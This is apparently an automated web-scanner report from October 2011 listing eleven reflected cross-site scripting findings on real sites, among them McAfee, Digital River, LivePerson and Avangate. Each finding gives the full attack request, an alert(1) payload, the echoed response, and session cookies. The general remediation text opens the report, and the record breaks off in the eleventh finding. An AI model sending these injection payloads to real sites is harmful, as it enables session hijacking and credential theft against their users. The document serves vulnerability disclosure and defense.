XSS, Reflected Cross Site Scripting, Javascript, Injection, Arbitrary, Attribute, 10232011-01

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://c2.softonicads.com/cgi-bin/request [jsoncallback parameter] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c2.softonicads.com
Path:	/cgi-bin/request

Issue detail

The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload 5dbc2<script>alert(1)</script>68459b59f86 was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/request?targeting=3&country=US&instance=2&limit=4&platform=1177&jsoncallback=json_process_cpc5dbc2<script>alert(1)</script>68459b59f86&section=1177 HTTP/1.1
Host: c2.softonicads.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://en.softonic.com/phones
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 23 Oct 2011 16:31:43 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 1737
Connection: close
Content-Type: application/json

json_process_cpc5dbc2<script>alert(1)</script>68459b59f86( {
   "ads_list":    [{
           "sph_id":    0,
           "id_ad":    3708,
           "id_key_sec":    1177,
           "id_platform":    1,
           "id_campaign":    1679,
           "title":    "Idea Flight",
           "custom_version":    "",
           "description":    "The only
...[SNIP]...

1.2. http://display.digitalriver.com/ [aid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://display.digitalriver.com
Path:	/

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d02e5'-alert(1)-'1d9eae90bbe was submitted in the aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?aid=244d02e5'-alert(1)-'1d9eae90bbe&tax=trend_micro HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://us.trendmicro.com/us/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op537homegum=a00602v02x27a6r03i314863e

Response

HTTP/1.1 200 OK
Date: Sun, 23 Oct 2011 16:26:55 GMT
Server: Apache/2.2.9
Expires: Sun, 23 Oct 2011 16:56:55 GMT
Last-Modified: Sun, 23 Oct 2011 16:26:55 GMT
Content-Length: 237
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//digr.netmng.com/?aid=244d02e5'-alert(1)-'1d9eae90bbe&tax=trend_micro';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

1.3. http://display.digitalriver.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://display.digitalriver.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2197'-alert(1)-'30da97cd78e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?aid=244&tax=trend_micro&c2197'-alert(1)-'30da97cd78e=1 HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://us.trendmicro.com/us/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op537homegum=a00602v02x27a6r03i314863e

Response

HTTP/1.1 200 OK
Date: Sun, 23 Oct 2011 16:26:57 GMT
Server: Apache/2.2.9
Expires: Sun, 23 Oct 2011 16:56:57 GMT
Last-Modified: Sun, 23 Oct 2011 16:26:57 GMT
Content-Length: 240
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//digr.netmng.com/?aid=244&tax=trend_micro&c2197'-alert(1)-'30da97cd78e=1';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

1.4. http://display.digitalriver.com/ [tax parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://display.digitalriver.com
Path:	/

Issue detail

The value of the tax request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b44e'-alert(1)-'b8c58074559 was submitted in the tax parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?aid=244&tax=trend_micro9b44e'-alert(1)-'b8c58074559 HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://us.trendmicro.com/us/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op537homegum=a00602v02x27a6r03i314863e

Response

HTTP/1.1 200 OK
Date: Sun, 23 Oct 2011 16:26:56 GMT
Server: Apache/2.2.9
Expires: Sun, 23 Oct 2011 16:56:56 GMT
Last-Modified: Sun, 23 Oct 2011 16:26:56 GMT
Content-Length: 237
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//digr.netmng.com/?aid=244&tax=trend_micro9b44e'-alert(1)-'b8c58074559';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

1.5. http://home.mcafee.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://home.mcafee.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 473ee'><script>alert(1)</script>53f145d563c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?473ee'><script>alert(1)</script>53f145d563c=1 HTTP/1.1
Host: home.mcafee.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.mcafee.com/us/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|273B41F7051D1961-400001298006D38B[CE]; SiteID=1; langid=1; Locale=EN-US; HPrst=gu=6f17ff2e-8a72-4e21-ad27-857754422b35&loc=EN-US; mbox=session#1317384062138-394024#1317387183|PC#1317384062138-394024.19#1319977323|check#true#1317385383; isvt_visitor=YUPutwoBC2cAAAx@cYwAAAAAABOUS9tR4FyeWW; s_ev8=%5B%5B%27direct%27%2C%271317384116696%27%5D%2C%5B%27mcafee%27%2C%271317385148375%27%5D%2C%5B%27direct%27%2C%271317385426538%27%5D%5D; CookieInformation=locale=us; s_cc=true; s_nr=1319387329167-Repeat; s_sq=mcafeecomglobal%3D%2526pid%253Dcorp%25253Aen-us%25253Adirect%25253Amcafee%25253Asegment_page%2526pidt%253D1%2526oid%253Dhttp%25253A//home.mcafee.com/%2526ot%253DA

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Sat, 23-Oct-2021 16:29:43 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Wed, 23-Oct-2041 16:29:43 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0; path=/
Set-Cookie: SessionInfo=AffiliateId=0; path=/
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Sat, 23-Oct-2021 16:29:43 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=6f17ff2e-8a72-4e21-ad27-857754422b35&loc=EN-US; domain=mcafee.com; expires=Sat, 23-Oct-2021 16:29:43 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fvirusinfo%2f&pple=iq5nNK-ISQc78yUmSkAv9A2&inur=iq5nNK-ISQc78yUmSkAv9A2&ituof=iq5nNK-ISQc78yUmSkAv9A2&isr=iq5nNK-ISQc78yUmSkAv9A2&sbo=iq5nNK-ISQc78yUmSkAv9A2&om_icr=iq5nNK-ISQc78yUmSkAv9A2&om_upsa=iq5nNK-ISQc78yUmSkAv9A2&ttprdt=iq5nNK-ISQc78yUmSkAv9A2&flgn=iq5nNK-ISQc78yUmSkAv9A2&pbinfo=iq5nNK-ISQc78yUmSkAv9A2; domain=mcafee.com; path=/; HttpOnly
X-Powered-By: ASP.NET
MS: SJV5
Date: Sun, 23 Oct 2011 16:29:42 GMT
Content-Length: 2836

<HTML>
<head></head>
<body>
<form id = 'frmPIO' name = 'frmPIO' action='http://home.mcafee.com/Default.aspx?473ee'><script>alert(1)</script>53f145d563c=1' method='post'>
<input type ='hidden' i
...[SNIP]...

1.6. http://home.mcafee.com/Default.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://home.mcafee.com
Path:	/Default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 86fda'><script>alert(1)</script>9ebe5510c46 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Default.aspx?86fda'><script>alert(1)</script>9ebe5510c46=1 HTTP/1.1
Host: home.mcafee.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.mcafee.com/us/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|273B41F7051D1961-400001298006D38B[CE]; mbox=session#1317384062138-394024#1317387183|PC#1317384062138-394024.19#1319977323|check#true#1317385383; isvt_visitor=YUPutwoBC2cAAAx@cYwAAAAAABOUS9tR4FyeWW; s_ev8=%5B%5B%27direct%27%2C%271317384116696%27%5D%2C%5B%27mcafee%27%2C%271317385148375%27%5D%2C%5B%27direct%27%2C%271317385426538%27%5D%5D; CookieInformation=locale=us; s_cc=true; s_nr=1319387329167-Repeat; s_sq=mcafeecomglobal%3D%2526pid%253Dcorp%25253Aen-us%25253Adirect%25253Amcafee%25253Asegment_page%2526pidt%253D1%2526oid%253Dhttp%25253A//home.mcafee.com/%2526ot%253DA; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; SessionInfo=AffiliateId=0; lBounceURL=http://home.mcafee.com/; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Locale=EN-US; HPrst=gu=6f17ff2e-8a72-4e21-ad27-857754422b35&loc=EN-US; AffID=0-0; Currency=56; HRntm=aff=0-0&cur=56&lbu=http%3a%2f%2fhome.mcafee.com%2f&pple=iq5nNK-ISQc78yUmSkAv9A2&inur=iq5nNK-ISQc78yUmSkAv9A2&ituof=iq5nNK-ISQc78yUmSkAv9A2&isr=iq5nNK-ISQc78yUmSkAv9A2&sbo=iq5nNK-ISQc78yUmSkAv9A2&om_icr=iq5nNK-ISQc78yUmSkAv9A2&om_upsa=iq5nNK-ISQc78yUmSkAv9A2&ttprdt=iq5nNK-ISQc78yUmSkAv9A2&flgn=iq5nNK-ISQc78yUmSkAv9A2&pbinfo=iq5nNK-ISQc78yUmSkAv9A2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Sat, 23-Oct-2021 16:29:57 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Wed, 23-Oct-2041 16:29:57 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0; path=/
Set-Cookie: SessionInfo=AffiliateId=0; path=/
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Sat, 23-Oct-2021 16:29:57 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=6f17ff2e-8a72-4e21-ad27-857754422b35&loc=EN-US; domain=mcafee.com; expires=Sat, 23-Oct-2021 16:29:57 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fvirusinfo%2f&pple=iq5nNK-ISQc78yUmSkAv9A2&inur=iq5nNK-ISQc78yUmSkAv9A2&ituof=iq5nNK-ISQc78yUmSkAv9A2&isr=iq5nNK-ISQc78yUmSkAv9A2&sbo=iq5nNK-ISQc78yUmSkAv9A2&om_icr=iq5nNK-ISQc78yUmSkAv9A2&om_upsa=iq5nNK-ISQc78yUmSkAv9A2&ttprdt=iq5nNK-ISQc78yUmSkAv9A2&flgn=iq5nNK-ISQc78yUmSkAv9A2&pbinfo=iq5nNK-ISQc78yUmSkAv9A2; domain=mcafee.com; path=/; HttpOnly
X-Powered-By: ASP.NET
MS: SJV8
Date: Sun, 23 Oct 2011 16:29:56 GMT
Content-Length: 2836

<HTML>
<head></head>
<body>
<form id = 'frmPIO' name = 'frmPIO' action='http://home.mcafee.com/Default.aspx?86fda'><script>alert(1)</script>9ebe5510c46=1' method='post'>
<input type ='hidden' i
...[SNIP]...

1.7. http://pctools.tt.omtrdc.net/m2/pctools/mbox/standard [mbox parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pctools.tt.omtrdc.net
Path:	/m2/pctools/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload b5388<script>alert(1)</script>ca1f38033ea was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/pctools/mbox/standard?mboxHost=www.pctools.com&mboxSession=1319387183177-475539&mboxPage=1319387183177-475539&screenHeight=1200&screenWidth=1920&browserWidth=1176&browserHeight=904&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=default_lpb5388<script>alert(1)</script>ca1f38033ea&mboxId=0&mboxTime=1319369183623&mboxURL=http%3A%2F%2Fwww.pctools.com%2F&mboxReferrer=http%3A%2F%2Fwww.av-comparatives.org%2F&mboxVersion=40 HTTP/1.1
Host: pctools.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.pctools.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1319387183177-475539.19; Domain=pctools.tt.omtrdc.net; Expires=Sun, 06-Nov-2011 16:27:25 GMT; Path=/m2/pctools
Content-Type: text/javascript
Content-Length: 206
Date: Sun, 23 Oct 2011 16:27:25 GMT
Server: Test & Target

mboxFactories.get('default').get('default_lpb5388<script>alert(1)</script>ca1f38033ea',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1319387183177-475539.19");

1.8. http://sales.liveperson.net/hc/2735064/ [msessionkey parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/2735064/

Issue detail

The value of the msessionkey request parameter is copied into the HTML document as plain text between tags. The payload e2225<img%20src%3da%20onerror%3dalert(1)>fd97a2d10a7 was submitted in the msessionkey parameter. This input was echoed as e2225<img src=a onerror=alert(1)>fd97a2d10a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hc/2735064/?&visitor=5110247826455&msessionkey=8946513708771516066e2225<img%20src%3da%20onerror%3dalert(1)>fd97a2d10a7&siteContainer=STANDALONE&site=2735064&cmd=mTagKnockPage&lpCallId=138424393255-566736930282&protV=20&lpjson=1&id=6886589522&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-norton-estore-us-english%7ClpMTagConfig.db1%7ClpButton%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://buy.norton.com/estore/mf/productDetails/slotNo/-1/productSkuCode/21184748/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8946513708771516066; HumanClickSiteContainerID_2735064=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1319310919316

Response

HTTP/1.1 200 OK
Date: Sun, 23 Oct 2011 16:35:40 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=8946513708771516066e2225<img src=a onerror=alert(1)>fd97a2d10a7; path=/hc/2735064
Set-Cookie: HumanClickKEY=8946513708771516066e2225<img src=a onerror=alert(1)>fd97a2d10a7; path=/hc/2735064
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sun, 23 Oct 2011 16:35:41 GMT
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 36825

lpConnLib.Process({"ResultSet": {"lpCallId":"138424393255-566736930282","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...
,{"code_id": "FPCookie", "js_code": "lpMTagConfig.FPC_VID_NAME='2735064-VID'; lpMTagConfig.FPC_VID='5110247826455'; lpMTagConfig.FPC_SKEY_NAME='2735064-SKEY'; lpMTagConfig.FPC_SKEY='8946513708771516066e2225<img src=a onerror=alert(1)>fd97a2d10a7';lpMTagConfig.FPC_CONT_NAME='HumanClickSiteContainerID_2735064'; lpMTagConfig.FPC_CONT='STANDALONE'"},{"code_id": "SYSTEM!firstpartycookies_compact.js", "js_code": "function lpFirstPartyCookieSupport(
...[SNIP]...

1.9. https://secure.avangate.com/order/cart.php [CART_ID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://secure.avangate.com
Path:	/order/cart.php

Issue detail

The value of the CART_ID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce942"><script>alert(1)</script>221f4b7027a924945 was submitted in the CART_ID parameter. This input was echoed as ce942\"><script>alert(1)</script>221f4b7027a924945 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /order/cart.php?CART_ID=6666fe17f2bc324cd19f55da68f5a44bce942"><script>alert(1)</script>221f4b7027a924945&qty0=1&prod0=4020750&submit_type=cross_selling&coupon=&Update=true&Checkout=true&Update=true HTTP/1.1
Host: secure.avangate.com
Connection: keep-alive
Cache-Control: max-age=0
Origin: https://secure.avangate.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://secure.avangate.com/order/cart.php?PRODS=4020750&QTY=1&OPTIONS4020750=ES-AV/1-1&CURRENCY=USD&LANGUAGES=en&SHOPURL=http://www.escanav.com/mwscnew/index.asp?cu=USD
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=eq6ds2k5q5c1ls2c0kr4fbb3k8g7kgn4; GKD=%95%DB%AC%E2%A0%BC%90%BA%92%A9%B3%DA%BD%C2%A0%9A%90%AE%99%B9%95%CE%BD%D5%A0%CF%8D%A9%92%96%9A%CA%B0%9D%9C%98%90%BB%9E%AB%97%B5%C6%A8

Response (redirected)

HTTP/1.1 200 OK
Server: Avangate
Date: Sun, 23 Oct 2011 16:35:34 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 38208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--[if IE 9]>
<meta http-equiv="X-UA-Compatible
...[SNIP]...
<a href="/order/nojs.php?CART_ID=6666fe17f2bc324cd19f55da68f5a44bce942\"><script>alert(1)</script>221f4b7027a924945" target="_blank">
...[SNIP]...

1.10. https://secure.avangate.com/order/cart.php [SHOPURL parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://secure.avangate.com
Path:	/order/cart.php

Issue detail

The value of the SHOPURL request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 27a2c'><script>alert(1)</script>61b00100668 was submitted in the SHOPURL parameter. This input was echoed as 27a2c\'><script>alert(1)</script>61b00100668 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /order/cart.php?PRODS=4020750&QTY=1&OPTIONS4020750=ES-AV/1-1&CURRENCY=USD&LANGUAGES=en&SHOPURL=http://www.escanav.com/mwscnew/index.asp?cu=USD27a2c'><script>alert(1)</script>61b00100668 HTTP/1.1
Host: secure.avangate.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.escanav.com/english/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Avangate
Date: Sun, 23 Oct 2011 16:29:39 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 41945

<html>
<head>

<meta http-equiv="X-UA-Compatible" content="IE=Edge"/>
<meta http-equiv=
...[SNIP]...
<a class="order__link order__homepage__link" href='http://www.escanav.com/mwscnew/index.asp?cu=USD27a2c\'><script>alert(1)</script>61b00100668'>
...[SNIP]...

1.11. https://secure.avangate.com/order/cart.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://secure.avangate.com
Path:	/order/cart.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 964cf'><script>alert(1)</script>bddb008a6fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 964cf\'><script>alert(1)</script>bddb008a6fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /order/cart.php?PRODS=4020750&QTY=1&OPTIONS4020750=ES-AV/1-1&CURRENCY=USD&LANGUAGES=en&SHOPURL=http://www.escanav.com/mwscnew/index.asp?cu/964cf'><script>alert(1)</script>bddb008a6fb=USD HTTP/1.1
Host: secure.avangate.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.escanav.com/english/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Avangate
Date: Sun, 23 Oct 2011 16:29:45 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
